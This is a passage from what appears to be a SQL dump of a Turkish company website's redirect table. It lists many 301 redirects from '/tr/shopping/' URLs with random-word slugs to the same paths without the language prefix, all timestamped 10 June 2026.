00:00:00',301),(67053,'https://3s-technologies.com.tr/tr/shopping/haunter/1706441503.html',NULL,'https://3s-technologies.com.tr/shopping/haunter/1706441503.html','',1,0,'2026-06-10 22:51:53','0000-00-00 00:00:00',301),(67054,'https://3s-technologies.com.tr/tr/shopping/paradoxurus/2584118662.html',NULL,'https://3s-technologies.com.tr/shopping/paradoxurus/2584118662.html','',1,0,'2026-06-10 22:51:58','0000-00-00 00:00:00',301),(67055,'https://3s-technologies.com.tr/tr/shopping/dragonet/2567812184.html',NULL,'https://3s-technologies.com.tr/shopping/dragonet/2567812184.html','',1,0,'2026-06-10 22:52:03','0000-00-00 00:00:00',301),(67056,'https://3s-technologies.com.tr/tr/shopping/eleotris/363279335.html',NULL,'https://3s-technologies.com.tr/shopping/eleotris/363279335.html','',1,0,'2026-06-10 22:52:08','0000-00-00 00:00:00',301),(67057,'https://3s-technologies.com.tr/tr/shopping/deafened/1629550113.html',NULL,'https://3s-technologies.com.tr/shopping/deafened/1629550113.html','',1,0,'2026-06-10 22:52:13','0000-00-00 00:00:00',301),(67058,'https://3s-technologies.com.tr/tr/shopping/corcia/1235063579.html',NULL,'https://3s-technologies.com.tr/shopping/corcia/1235063579.html','',1,0,'2026-06-10 22:52:21','0000-00-00 00:00:00',301),(67059,'https://3s-technologies.com.tr/tr/shopping/reinfect/337190347.html',NULL,'https://3s-technologies.com.tr/shopping/reinfect/337190347.html','',1,0,'2026-06-10 22:52:26','0000-00-00 00:00:00',301),(67060,'https://3s-technologies.com.tr/tr/shopping/caryopses/1520790385.html',NULL,'https://3s-technologies.com.tr/shopping/caryopses/1520790385.html','',1,0,'2026-06-10 22:52:31','0000-00-00 00:00:00',301),(67061,'https://3s-technologies.com.tr/tr/shopping/podurae/2675171822.html',NULL,'https://3s-technologies.com.tr/shopping/podurae/2675171822.html','',1,0,'2026-06-10 22:52:39','0000-00-00 00:00:00',301),(67062,'https://3s-technologies.com.tr/tr/shopping/albinotic/3331878320.html',NULL,'https://3s-technologies.com.tr/shopping/albinotic/3331878320.html','',1,0,'2026-06-10 22:52:46','0000-00-00 00:00:00',301),(67063,'https://3s-technologies.com.tr/tr/shopping/adjectiving/889629942.html',NULL,'https://3s-technologies.com.tr/shopping/adjectiving/889629942.html','',1,0,'2026-06-10 22:52:50','0000-00-00 00:00:00',301),(67064,'https://3s-technologies.com.tr/tr/shopping/septifarious/3463306642.html',NULL,'https://3s-technologies.com.tr/shopping/septifarious/3463306642.html','',1,0,'2026-06-10 22:52:55','0000-00-00 00:00:00',301),(67065,'https://3s-technologies.com.tr/tr/shopping/facere/3186944774.html',NULL,'https://3s-technologies.com.tr/shopping/facere/3186944774.html','',1,0,'2026-06-10 22:53:00','0000-00-00 00:00:00',301),(67066,'https://3s-technologies.com.tr/tr/shopping/morbus/3039190124.html',NULL,'https://3s-technologies.com.tr/shopping/morbus/3039190124.html','',1,0,'2026-06-10 22:53:05','0000-00-00 00:00:00',301),(67067,'https://3s-technologies.com.tr/tr/shopping/exscinded/1976882650.html',NULL,'https://3s-technologies.com.tr/shopping/exscinded/1976882650.html','',1,0,'2026-06-10 22:53:11','0000-00-00 00:00:00',301),(67068,'https://3s-technologies.com.tr/tr/shopping/abolition/1548273307.html',NULL,'https://3s-technologies.com.tr/shopping/abolition/1548273307.html','',1,0,'2026-06-10 22:53:16','0000-00-00 00:00:00',301),(67069,'https://3s-technologies.com.tr/tr/shopping/jocosus/2269924078.html',NULL,'https://3s-technologies.com.tr/shopping/jocosus/2269924078.html','',1,0,'2026-06-10 22:53:22','0000-00-00 00:00:00',301),(67070,'https://3s-technologies.com.tr/tr/shopping/braille/1236275678.html',NULL,'https://3s-technologies.com.tr/shopping/braille/1236275678.html','',1,0,'2026-06-10 22:53:27','0000-00-00 00:00:00',301),(67071,'https://3s-technologies.com.tr/tr/shopping/heavened/4251485183.html',NULL,'https://3s-technologies.com.tr/shopping/heavened/4251485183.html','',1,0,'2026-06-10 22:53:32','0000-00-00 00:00:00',301),(67072,'https://3s-technologies.com.tr/tr/shopping/allice/2863952520.html',NULL,'https://3s-technologies.com.tr/shopping/allice/2863952520.html','',1,0,'2026-06-10 22:53:37','0000-00-00 00:00:00',301),(67073,'https://3s-technologies.com.tr/tr/shopping/gerbera/4103730501.html',NULL,'https://3s-technologies.com.tr/shopping/gerbera/4103730501.html','',1,0,'2026-06-10 22:53:42','0000-00-00 00:00:00',301),(67074,'https://3s-technologies.com.tr/tr/shopping/bescorn/1820930656.html',NULL,'https://3s-technologies.com.tr/shopping/bescorn/1820930656.html','',1,0,'2026-06-10 22:53:47','0000-00-00 00:00:00',301),(67075,'https://3s-technologies.com.tr/tr/shopping/bulldozing/950131284.html',NULL,'https://3s-technologies.com.tr/shopping/bulldozing/950131284.html','',1,0,'2026-06-10 22:53:52','0000-00-00 00:00:00',301),(67076,'https://3s-technologies.com.tr/tr/shopping/shutten/2701103475.html',NULL,'https://3s-technologies.com.tr/shopping/shutten/2701103475.html','',1,0,'2026-06-10 22:53:57','0000-00-00 00:00:00',301),(67077,'https://3s-technologies.com.tr/tr/shopping/achatina/23980619.html',NULL,'https://3s-technologies.com.tr/shopping/achatina/23980619.html','',1,0,'2026-06-10 22:54:02','0000-00-00 00:00:00',301),(67078,'https://3s-technologies.com.tr/tr/shopping/symphyses/433979104.html',NULL,'https://3s-technologies.com.tr/shopping/symphyses/433979104.html','',1,0,'2026-06-10 22:54:07','0000-00-00 00:00:00',301),(67079,'https://3s-technologies.com.tr/tr/shopping/entreative/728907341.html',NULL,'https://3s-technologies.com.tr/shopping/entreative/728907341.html','',1,0,'2026-06-10 22:54:13','0000-00-00 00:00:00',301),(67080,'https://3s-technologies.com.tr/tr/shopping/puerile/2785912751.html',NULL,'https://3s-technologies.com.tr/shopping/puerile/2785912751.html','',1,0,'2026-06-10 22:54:17','0000-00-00 00:00:00',301),(67081,'https://3s-technologies.com.tr/tr/shopping/bullfeast/2277100587.html',NULL,'https://3s-technologies.com.tr/shopping/bullfeast/2277100587.html','',1,0,'2026-06-10 22:54:22','0000-00-00 00:00:00',301),(67082,'https://3s-technologies.com.tr/tr/shopping/lirellaeform/2644867097.html',NULL,'https://3s-technologies.com.tr/shopping/lirellaeform/2644867097.html','',1,0,'2026-06-10 22:54:27','0000-00-00 00:00:00',301),(67083,'https://3s-technologies.com.tr/tr/shopping/enzootic/3611061308.html',NULL,'https://3s-technologies.com.tr/shopping/enzootic/3611061308.html','',1,0,'2026-06-10 22:54:32','0000-00-00 00:00:00',301),(67084,'https://3s-technologies.com.tr/tr/shopping/trammeler/3586529745.html',NULL,'https://3s-technologies.com.tr/shopping/trammeler/3586529745.html','',1,0,'2026-06-10 22:54:37','0000-00-00 00:00:00',301),(67085,'https://3s-technologies.com.tr/tr/shopping/towards/1913901297.html',NULL,'https://3s-technologies.com.tr/shopping/towards/1913901297.html','',1,0,'2026-06-10 22:54:42','0000-00-00 00:00:00',301),(67086,'https://3s-technologies.com.tr/tr/shopping/balloter/2306780480.html',NULL,'https://3s-technologies.com.tr/shopping/balloter/2306780480.html','',1,0,'2026-06-10 22:54:47','0000-00-00 00:00:00',301),(67087,'https://3s-technologies.com.tr/tr/shopping/reclasp/3081422067.html',NULL,'https://3s-technologies.com.tr/shopping/reclasp/3081422067.html','',1,0,'2026-06-10 22:54:52','0000-00-00 00:00:00',301),(67088,'https://3s-technologies.com.tr/tr/shopping/inconcrete/609847696.html',NULL,'https://3s-technologies.com.tr/shopping/inconcrete/609847696.html','',1,0,'2026-06-10 22:54:57','0000-00-00 00:00:00',301),(67089,'https://3s-technologies.com.tr/tr/shopping/tillandsia/2892647541.html',NULL,'https://3s-technologies.com.tr/shopping/tillandsia/2892647541.html','',1,0,'2026-06-10 22:55:05','0000-00-00 00:00:00',301),(67090,'https://3s-technologies.com.tr/tr/shopping/lissencephala/338402446.html',NULL,'https://3s-technologies.com.tr/shopping/lissencephala/338402446.html','',1,0,'2026-06-10 22:55:10','0000-00-00 00:00:00',301),(67091,'https://3s-technologies.com.tr/tr/shopping/sculptile/1722584442.html',NULL,'https://3s-technologies.com.tr/shopping/sculptile/1722584442.html','',1,0,'2026-06-10 22:55:15','0000-00-00 00:00:00',301),(67092,'https://3s-technologies.com.tr/tr/shopping/discretionally/2591295171.html',NULL,'https://3s-technologies.com.tr/shopping/discretionally/2591295171.html','',1,0,'2026-06-10 22:55:20','0000-00-00 00:00:00',301),(67093,'https://3s-technologies.com.tr/tr/shopping/curculios/327407821.html',NULL,'https://3s-technologies.com.tr/shopping/curculios/327407821.html','',1,0,'2026-06-10 22:55:25','0000-00-00 00:00:00',301),(67094,'https://3s-technologies.com.tr/tr/shopping/hygroscopic/3447163671.html',NULL,'https://3s-technologies.com.tr/shopping/hygroscopic/3447163671.html','',1,0,'2026-06-10 22:55:30','0000-00-00 00:00:00',301),(67095,'https://3s-technologies.com.tr/tr/shopping/disinfectant/74946528.html',NULL,'https://3s-technologies.com.tr/shopping/disinfectant/74946528.html','',1,0,'2026-06-10 22:55:35','0000-00-00 00:00:00',301),(67096,'https://3s-technologies.com.tr/tr/shopping/punctipinnis/558881787.html',NULL,'https://3s-technologies.com.tr/shopping/punctipinnis/558881787.html','',1,0,'2026-06-10 22:55:40','0000-00-00 00:00:00',301),(67097,'https://3s-technologies.com.tr/tr/shopping/censorship/484944997.html',NULL,'https://3s-technologies.com.tr/shopping/censorship/484944997.html','',1,0,'2026-06-10 22:55:45','0000-00-00 00:00:00',301),(67098,'https://3s-technologies.com.tr/tr/shopping/recenter/1206595769.html',NULL,'https://3s-technologies.com.tr/shopping/recenter/1206595769.html','',1,0,'2026-06-10 22:55:52','0000-00-00 00:00:00',301),(67099,'https://3s-technologies.com.tr/tr/shopping/trichoglossus/3568829333.html',NULL,'https://3s-technologies.com.tr/shopping/trichoglossus/3568829333.html','',1,0,'2026-06-10 22:55:57','0000-00-00 00:00:00',301),(67100,'https://3s-technologies.com.tr/tr/shopping/antiamerican/2498324546.html',NULL,'https://3s-technologies.com.tr/shopping/antiamerican/2498324546.html','',1,0,'2026-06-10 22:56:02','0000-00-00 00:00:00',301),(67101,'https://3s-technologies.com.tr/tr/shopping/zoozoo/1087472420.html',NULL,'https://3s-technologies.com.tr/shopping/zoozoo/1087472420.html','',1,0,'2026-06-10 22:56:07','0000-00-00 00:00:00',301),(67102,'https://3s-technologies.com.tr/tr/shopping/unsymmetrically/1699264994.html',NULL,'https://3s-technologies.com.tr/shopping/unsymmetrically/1699264994.html','',1,0,'2026-06-10 22:56:12','0000-00-00 00:00:00',301),(67103,'https://3s-technologies.com.tr/tr/shopping/genteelness/1915113380.html',NULL,'https://3s-technologies.com.tr/shopping/genteelness/1915113380.html','',1,0,'2026-06-10 22:56:17','0000-00-00 00:00:00',301),(67104,'https://3s-technologies.com.tr/tr/shopping/secundogeniture/3040402223.html',NULL,'https://3s-technologies.com.tr/shopping/secundogeniture/3040402223.html','',1,0,'2026-06-10 22:56:22','0000-00-00 00:00:00',301),(67105,'https://3s-technologies.com.tr/tr/shopping/croziered/2375446785.html',NULL,'https://3s-technologies.com.tr/shopping/croziered/2375446785.html','',1,0,'2026-06-10 22:56:27','0000-00-00 00:00:00',301),(67106,'https://3s-technologies.com.tr/tr/shopping/lawyerlike/3055333063.html',NULL,'https://3s-technologies.com.tr/shopping/lawyerlike/3055333063.html','',1,0,'2026-06-10 22:56:32','0000-00-00 00:00:00',301),(67107,'https://3s-technologies.com.tr/tr/shopping/hinduism/1164363826.html',NULL,'https://3s-technologies.com.tr/shopping/hinduism/1164363826.html','',1,0,'2026-06-10 22:56:37','0000-00-00 00:00:00',301),(67108,'https://3s-technologies.com.tr/tr/shopping/utterable/2080896716.html',NULL,'https://3s-technologies.com.tr/shopping/utterable/2080896716.html','',1,0,'2026-06-10 22:56:47','0000-00-00 00:00:00',301),(67109,'https://3s-technologies.com.tr/tr/shopping/section/4147224929.html',NULL,'https://3s-technologies.com.tr/shopping/section/4147224929.html','',1,0,'2026-06-10 22:56:49','0000-00-00 00:00:00',301),(67110,'https://3s-technologies.com.tr/tr/shopping/selfdevoted/1210237012.html',NULL,'https://3s-technologies.com.tr/shopping/selfdevoted/1210237012.html','',1,0,'2026-06-10 22:56:54','0000-00-00 00:00:00',301),(67111,'https://3s-technologies.com.tr/tr/shopping/composedness/614599991.html',NULL,'https://3s-technologies.com.tr/shopping/composedness/614599991.html','',1,0,'2026-06-10 22:56:59','0000-00-00 00:00:00',301),(67112,'https://3s-technologies.com.tr/tr/shopping/explicative/4245407588.html',NULL,'https://3s-technologies.com.tr/shopping/explicative/4245407588.html','',1,0,'2026-06-10 22:57:04','0000-00-00 00:00:00',301),(67113,'https://3s-technologies.com.tr/tr/shopping/renewability/1865637167.html',NULL,'https://3s-technologies.com.tr/shopping/renewability/1865637167.html','',1,0,'2026-06-10 22:57:09','0000-00-00 00:00:00',301),(67114,'https://3s-technologies.com.tr/tr/shopping/editorially/300317832.html',NULL,'https://3s-technologies.com.tr/shopping/editorially/300317832.html','',1,0,'2026-06-10 22:57:14','0000-00-00 00:00:00',301),(67115,'https://3s-technologies.com.tr/tr/shopping/septangular/2893746471.html',NULL,'https://3s-technologies.com.tr/shopping/septangular/2893746471.html','',1,0,'2026-06-10 22:57:20','0000-00-00 00:00:00',301),(67116,'https://3s-technologies.com.tr/tr/shopping/electroballistic/3585464069.html',NULL,'https://3s-technologies.com.tr/shopping/electroballistic/3585464069.html','',1,0,'2026-06-10 22:57:24','0000-00-00 00:00:00',301),(67117,'https://3s-technologies.com.tr/tr/shopping/hyperplastic/328506751.html',NULL,'https://3s-technologies.com.tr/shopping/hyperplastic/328506751.html','',1,0,'2026-06-10 22:57:29','0000-00-00 00:00:00',301),(67118,'https://3s-technologies.com.tr/tr/shopping/fiveling/4195489043.html',NULL,'https://3s-technologies.com.tr/shopping/fiveling/4195489043.html','',1,0,'2026-06-10 22:57:41','0000-00-00 00:00:00',301),(67119,'https://3s-technologies.com.tr/tr/shopping/endomorph/3888211360.html',NULL,'https://3s-technologies.com.tr/shopping/endomorph/3888211360.html','',1,0,'2026-06-10 22:57:44','0000-00-00 00:00:00',301),(67120,'https://3s-technologies.com.tr/tr/shopping/parentally/7396237.html',NULL,'https://3s-technologies.com.tr/shopping/parentally/7396237.html','',1,0,'2026-06-10 22:57:50','0000-00-00 00:00:00',301),(67121,'https://3s-technologies.com.tr/tr/shopping/mesad/3022442219.html',NULL,'https://3s-technologies.com.tr/shopping/mesad/3022442219.html','',1,0,'2026-06-10 22:57:55','0000-00-00 00:00:00',301),(67122,'https://3s-technologies.com.tr/tr/shopping/tranquilizing/2285443787.html',NULL,'https://3s-technologies.com.tr/shopping/tranquilizing/2285443787.html','',1,0,'2026-06-10 22:57:59','0000-00-00 00:00:00',301),(67123,'https://3s-technologies.com.tr/tr/shopping/lashed/1337602546.html',NULL,'https://3s-technologies.com.tr/shopping/lashed/1337602546.html','',1,0,'2026-06-10 22:58:04','0000-00-00 00:00:00',301),(67124,'https://3s-technologies.com.tr/tr/shopping/darter/902932830.html',NULL,'https://3s-technologies.com.tr/shopping/darter/902932830.html','',1,0,'2026-06-10 22:58:06','0000-00-00 00:00:00',301),(67125,'https://3s-technologies.com.tr/tr/shopping/adjustable/4037392309.html',NULL,'https://3s-technologies.com.tr/shopping/adjustable/4037392309.html','',1,0,'2026-06-10 22:58:11','0000-00-00 00:00:00',301),(67126,'https://3s-technologies.com.tr/tr/shopping/recommend/2314909464.html',NULL,'https://3s-technologies.com.tr/shopping/recommend/2314909464.html','',1,0,'2026-06-10 22:58:16','0000-00-00 00:00:00',301),(67127,'https://3s-technologies.com.tr/tr/shopping/bleaching/3021230104.html',NULL,'https://3s-technologies.com.tr/shopping/bleaching/3021230104.html','',1,0,'2026-06-10 22:58:21','0000-00-00 00:00:00',301),(67128,'https://3s-technologies.com.tr/tr/shopping/corncrib/3064674178.html',NULL,'https://3s-technologies.com.tr/shopping/corncrib/3064674178.html','',1,0,'2026-06-10 22:58:26','0000-00-00 00:00:00',301),(67129,'https://3s-technologies.com.tr/tr/shopping/scepterless/147974378.html',NULL,'https://3s-technologies.com.tr/shopping/scepterless/147974378.html','',1,0,'2026-06-10 22:58:31','0000-00-00 00:00:00',301),(67130,'https://3s-technologies.com.tr/tr/shopping/primary/4232313064.html',NULL,'https://3s-technologies.com.tr/shopping/primary/4232313064.html','',1,0,'2026-06-10 22:58:36','0000-00-00 00:00:00',301),(67131,'https://3s-technologies.com.tr/tr/shopping/tableman/1636303475.html',NULL,'https://3s-technologies.com.tr/shopping/tableman/1636303475.html','',1,0,'2026-06-10 22:58:45','0000-00-00 00:00:00',301),(67132,'https://3s-technologies.com.tr/tr/shopping/progression/1403713495.html',NULL,'https://3s-technologies.com.tr/shopping/progression/1403713495.html','',1,0,'2026-06-10 22:58:50','0000-00-00 00:00:00',301),(67133,'https://3s-technologies.com.tr/tr/shopping/ambushing/239796640.html',NULL,'https://3s-technologies.com.tr/shopping/ambushing/239796640.html','',1,0,'2026-06-10 22:58:55','0000-00-00 00:00:00',301),(67134,'https://3s-technologies.com.tr/tr/shopping/maggots/2743239349.html',NULL,'https://3s-technologies.com.tr/shopping/maggots/2743239349.html','',1,0,'2026-06-10 22:59:00','0000-00-00 00:00:00',301),(67135,'https://3s-technologies.com.tr/tr/shopping/selfcommunicative/1826895050.html',NULL,'https://3s-technologies.com.tr/shopping/selfcommunicative/1826895050.html','',1,0,'2026-06-10 22:59:05','0000-00-00 00:00:00',301),(67136,'https://3s-technologies.com.tr/tr/shopping/conveyancing/1685104794.html',NULL,'https://3s-technologies.com.tr/shopping/conveyancing/1685104794.html','',1,0,'2026-06-10 22:59:10','0000-00-00 00:00:00',301),(67137,'https://3s-technologies.com.tr/tr/shopping/pruner/2722951248.html',NULL,'https://3s-technologies.com.tr/shopping/pruner/2722951248.html','',1,0,'2026-06-10 22:59:15','0000-00-00 00:00:00',301),(67138,'https://3s-technologies.com.tr/tr/shopping/drivepipe/315248704.html',NULL,'https://3s-technologies.com.tr/shopping/drivepipe/315248704.html','',1,0,'2026-06-10 22:59:20','0000-00-00 00:00:00',301),(67139,'https://3s-technologies.com.tr/tr/shopping/bituminous/2163778125.html',NULL,'https://3s-technologies.com.tr/shopping/bituminous/2163778125.html','',1,0,'2026-06-10 22:59:30','0000-00-00 00:00:00',301),(67140,'https://3s-technologies.com.tr/tr/shopping/usually/1045493758.html',NULL,'https://3s-technologies.com.tr/shopping/usually/1045493758.html','',1,0,'2026-06-10 22:59:34','0000-00-00 00:00:00',301),(67141,'https://3s-technologies.com.tr/tr/shopping/gluing/1090849109.html',NULL,'https://3s-technologies.com.tr/shopping/gluing/1090849109.html','',1,0,'2026-06-10 22:59:39','0000-00-00 00:00:00',301),(67142,'https://3s-technologies.com.tr/tr/shopping/malacologist/2800006161.html',NULL,'https://3s-technologies.com.tr/shopping/malacologist/2800006161.html','',1,0,'2026-06-10 22:59:44','0000-00-00 00:00:00',301),(67143,'https://3s-technologies.com.tr/tr/shopping/confoundedly/2972851932.html',NULL,'https://3s-technologies.com.tr/shopping/confoundedly/2972851932.html','',1,0,'2026-06-10 22:59:49','0000-00-00 00:00:00',301),(67144,'https://3s-technologies.com.tr/tr/shopping/interneural/4183934892.html',NULL,'https://3s-technologies.com.tr/shopping/interneural/4183934892.html','',1,0,'2026-06-10 22:59:54','0000-00-00 00:00:00',301),(67145,'https://3s-technologies.com.tr/tr/shopping/scumber/3374861085.html',NULL,'https://3s-technologies.com.tr/shopping/scumber/3374861085.html','',1,0,'2026-06-10 22:59:59','0000-00-00 00:00:00',301),(67146,'https://3s-technologies.com.tr/tr/shopping/hideousness/1333966233.html',NULL,'https://3s-technologies.com.tr/shopping/hideousness/1333966233.html','',1,0,'2026-06-10 23:00:04','0000-00-00 00:00:00',301),(67147,'https://3s-technologies.com.tr/tr/shopping/undergo/3328433271.html',NULL,'https://3s-technologies.com.tr/shopping/undergo/3328433271.html','',1,0,'2026-06-10 23:00:09','0000-00-00 00:00:00',301),(67148,'https://3s-technologies.com.tr/tr/shopping/pomade/4020891964.html',NULL,'https://3s-technologies.com.tr/shopping/pomade/4020891964.html','',1,0,'2026-06-10 23:00:19','0000-00-00 00:00:00',301),(67149,'https://3s-technologies.com.tr/tr/shopping/textman/2102318417.html',NULL,'https://3s-technologies.com.tr/shopping/textman/2102318417.html','',1,0,'2026-06-10 23:00:23','0000-00-00 00:00:00',301),(67150,'https://3s-technologies.com.tr/tr/shopping/eanling/1922492025.html',NULL,'https://3s-technologies.com.tr/shopping/eanling/1922492025.html','',1,0,'2026-06-10 23:00:28','0000-00-00 00:00:00',301),(67151,'https://3s-technologies.com.tr/tr/shopping/anenterous/2923345666.html',NULL,'https://3s-technologies.com.tr/shopping/anenterous/2923345666.html','',1,0,'2026-06-10 23:00:33','0000-00-00 00:00:00',301),(67152,'https://3s-technologies.com.tr/tr/shopping/outrunning/2389396989.html',NULL,'https://3s-technologies.com.tr/shopping/outrunning/2389396989.html','',1,0,'2026-06-10 23:00:38','0000-00-00 00:00:00',301),(67153,'https://3s-technologies.com.tr/tr/shopping/limitour/2561030645.html',NULL,'https://3s-technologies.com.tr/shopping/limitour/2561030645.html','',1,0,'2026-06-10 23:00:43','0000-00-00 00:00:00',301),(67154,'https://3s-technologies.com.tr/tr/shopping/directional/1387590857.html',NULL,'https://3s-technologies.com.tr/shopping/directional/1387590857.html','',1,0,'2026-06-10 23:00:51','0000-00-00 00:00:00',301),(67155,'https://3s-technologies.com.tr/tr/shopping/polyhistor/1061097488.html',NULL,'https://3s-technologies.com.tr/shopping/polyhistor/1061097488.html','',1,0,'2026-06-10 23:00:53','0000-00-00 00:00:00',301),(67156,'https://3s-technologies.com.tr/tr/shopping/fortition/11234670.html',NULL,'https://3s-technologies.com.tr/shopping/fortition/11234670.html','',1,0,'2026-06-10 23:00:58','0000-00-00 00:00:00',301),(67157,'https://3s-technologies.com.tr/tr/shopping/leviratical/1265925211.html',NULL,'https://3s-technologies.com.tr/shopping/leviratical/1265925211.html','',1,0,'2026-06-10 23:01:03','0000-00-00 00:00:00',301),(67158,'https://3s-technologies.com.tr/tr/shopping/hennes/4278546979.html',NULL,'https://3s-technologies.com.tr/shopping/hennes/4278546979.html','',1,0,'2026-06-10 23:01:09','0000-00-00 00:00:00',301),(67159,'https://3s-technologies.com.tr/tr/shopping/snuggest/3592514456.html',NULL,'https://3s-technologies.com.tr/shopping/snuggest/3592514456.html','',1,0,'2026-06-10 23:01:16','0000-00-00 00:00:00',301),(67160,'https://3s-technologies.com.tr/tr/shopping/affixial/107809227.html',NULL,'https://3s-technologies.com.tr/shopping/affixial/107809227.html','',1,0,'2026-06-10 23:01:20','0000-00-00 00:00:00',301),(67161,'https://3s-technologies.com.tr/tr/shopping/cometarium/1604829759.html',NULL,'https://3s-technologies.com.tr/shopping/cometarium/1604829759.html','',1,0,'2026-06-10 23:01:25','0000-00-00 00:00:00',301),(67162,'https://3s-technologies.com.tr/tr/shopping/appeasement/3846441129.html',NULL,'https://3s-technologies.com.tr/shopping/appeasement/3846441129.html','',1,0,'2026-06-10 23:01:30','0000-00-00 00:00:00',301),(67163,'https://3s-technologies.com.tr/tr/shopping/parakeet/4060913909.html',NULL,'https://3s-technologies.com.tr/shopping/parakeet/4060913909.html','',1,0,'2026-06-10 23:01:35','0000-00-00 00:00:00',301),(67164,'https://3s-technologies.com.tr/tr/shopping/pachydermal/1303730670.html',NULL,'https://3s-technologies.com.tr/shopping/pachydermal/1303730670.html','',1,0,'2026-06-10 23:01:40','0000-00-00 00:00:00',301),(67165,'https://3s-technologies.com.tr/tr/shopping/dentation/3888673104.html',NULL,'https://3s-technologies.com.tr/shopping/dentation/3888673104.html','',1,0,'2026-06-10 23:01:46','0000-00-00 00:00:00',301),(67166,'https://3s-technologies.com.tr/tr/shopping/cuckold/1172954554.html',NULL,'https://3s-technologies.com.tr/shopping/cuckold/1172954554.html','',1,0,'2026-06-10 23:01:50','0000-00-00 00:00:00',301),(67167,'https://3s-technologies.com.tr/tr/shopping/rifling/1014276725.html',NULL,'https://3s-technologies.com.tr/shopping/rifling/1014276725.html','',1,0,'2026-06-10 23:01:55','0000-00-00 00:00:00',301),(67168,'https://3s-technologies.com.tr/tr/shopping/lightful/2987032433.html',NULL,'https://3s-technologies.com.tr/shopping/lightful/2987032433.html','',1,0,'2026-06-10 23:02:00','0000-00-00 00:00:00',301),(67169,'https://3s-technologies.com.tr/tr/shopping/craftily/632531834.html',NULL,'https://3s-technologies.com.tr/shopping/craftily/632531834.html','',1,0,'2026-06-10 23:02:05','0000-00-00 00:00:00',301),(67170,'https://3s-technologies.com.tr/tr/shopping/furry/127933821.html',NULL,'https://3s-technologies.com.tr/shopping/furry/127933821.html','',1,0,'2026-06-10 23:02:10','0000-00-00 00:00:00',301),(67171,'https://3s-technologies.com.tr/tr/shopping/spermatophyte/490880898.html',NULL,'https://3s-technologies.com.tr/shopping/spermatophyte/490880898.html','',1,0,'2026-06-10 23:02:16','0000-00-00 00:00:00',301),(67172,'https://3s-technologies.com.tr/tr/shopping/highsounding/1301537133.html',NULL,'https://3s-technologies.com.tr/shopping/highsounding/1301537133.html','',1,0,'2026-06-10 23:02:20','0000-00-00 00:00:00',301),(67173,'https://3s-technologies.com.tr/tr/shopping/plaintive/1150948613.html',NULL,'https://3s-technologies.com.tr/shopping/plaintive/1150948613.html','',1,0,'2026-06-10 23:02:25','0000-00-00 00:00:00',301),(67174,'https://3s-technologies.com.tr/tr/shopping/endecagynous/1833061612.html',NULL,'https://3s-technologies.com.tr/shopping/endecagynous/1833061612.html','',1,0,'2026-06-10 23:02:30','0000-00-00 00:00:00',301),(67175,'https://3s-technologies.com.tr/tr/shopping/obelize/2534058209.html',NULL,'https://3s-technologies.com.tr/shopping/obelize/2534058209.html','',1,0,'2026-06-10 23:02:35','0000-00-00 00:00:00',301),(67176,'https://3s-technologies.com.tr/tr/shopping/crapola/4132004428.html',NULL,'https://3s-technologies.com.tr/shopping/crapola/4132004428.html','',1,0,'2026-06-10 23:02:43','0000-00-00 00:00:00',301),(67177,'https://3s-technologies.com.tr/tr/shopping/suctorian/597872403.html',NULL,'https://3s-technologies.com.tr/shopping/suctorian/597872403.html','',1,0,'2026-06-10 23:02:47','0000-00-00 00:00:00',301),(67178,'https://3s-technologies.com.tr/tr/shopping/destrer/3282681417.html',NULL,'https://3s-technologies.com.tr/shopping/destrer/3282681417.html','',1,0,'2026-06-10 23:02:53','0000-00-00 00:00:00',301),(67179,'https://3s-technologies.com.tr/tr/shopping/tisane/3646677086.html',NULL,'https://3s-technologies.com.tr/shopping/tisane/3646677086.html','',1,0,'2026-06-10 23:02:57','0000-00-00 00:00:00',301),(67180,'https://3s-technologies.com.tr/tr/shopping/dambose/2803844594.html',NULL,'https://3s-technologies.com.tr/shopping/dambose/2803844594.html','',1,0,'2026-06-10 23:03:02','0000-00-00 00:00:00',301),(67181,'https://3s-technologies.com.tr/tr/shopping/hexanoic/1659854022.html',NULL,'https://3s-technologies.com.tr/shopping/hexanoic/1659854022.html','',1,0,'2026-06-10 23:03:08','0000-00-00 00:00:00',301),(67182,'https://3s-technologies.com.tr/tr/shopping/noble/608461361.html',NULL,'https://3s-technologies.com.tr/shopping/noble/608461361.html','',1,0,'2026-06-10 23:03:12','0000-00-00 00:00:00',301),(67183,'https://3s-technologies.com.tr/tr/shopping/clairobscur/3382239730.html',NULL,'https://3s-technologies.com.tr/shopping/clairobscur/3382239730.html','',1,0,'2026-06-10 23:03:17','0000-00-00 00:00:00',301),(67184,'https://3s-technologies.com.tr/tr/shopping/enderonic/1892668272.html',NULL,'https://3s-technologies.com.tr/shopping/enderonic/1892668272.html','',1,0,'2026-06-10 23:03:23','0000-00-00 00:00:00',301),(67185,'https://3s-technologies.com.tr/tr/shopping/entrochite/2083569429.html',NULL,'https://3s-technologies.com.tr/shopping/entrochite/2083569429.html','',1,0,'2026-06-10 23:03:28','0000-00-00 00:00:00',301),(67186,'https://3s-technologies.com.tr/tr/shopping/dolomite/2109494926.html',NULL,'https://3s-technologies.com.tr/shopping/dolomite/2109494926.html','',1,0,'2026-06-10 23:03:33','0000-00-00 00:00:00',301),(67187,'https://3s-technologies.com.tr/tr/shopping/umbratious/1323334884.html',NULL,'https://3s-technologies.com.tr/shopping/umbratious/1323334884.html','',1,0,'2026-06-10 23:03:38','0000-00-00 00:00:00',301),(67188,'https://3s-technologies.com.tr/tr/shopping/betterment/2995161417.html',NULL,'https://3s-technologies.com.tr/shopping/betterment/2995161417.html','',1,0,'2026-06-10 23:03:43','0000-00-00 00:00:00',301),(67189,'https://3s-technologies.com.tr/tr/shopping/labyrinthibranch/1380414364.html',NULL,'https://3s-technologies.com.tr/shopping/labyrinthibranch/1380414364.html','',1,0,'2026-06-10 23:03:48','0000-00-00 00:00:00',301),(67190,'https://3s-technologies.com.tr/tr/shopping/dodecagynia/2961154559.html',NULL,'https://3s-technologies.com.tr/shopping/dodecagynia/2961154559.html','',1,0,'2026-06-10 23:03:53','0000-00-00 00:00:00',301),(67191,'https://3s-technologies.com.tr/tr/shopping/tinctorium/2123213667.html',NULL,'https://3s-technologies.com.tr/shopping/tinctorium/2123213667.html','',1,0,'2026-06-10 23:03:59','0000-00-00 00:00:00',301),(67192,'https://3s-technologies.com.tr/tr/shopping/aberrate/3052138979.html',NULL,'https://3s-technologies.com.tr/shopping/aberrate/3052138979.html','',1,0,'2026-06-10 23:04:04','0000-00-00 00:00:00',301),(67193,'https://3s-technologies.com.tr/tr/shopping/eyewitness/2970332555.html',NULL,'https://3s-technologies.com.tr/shopping/eyewitness/2970332555.html','',1,0,'2026-06-10 23:04:09','0000-00-00 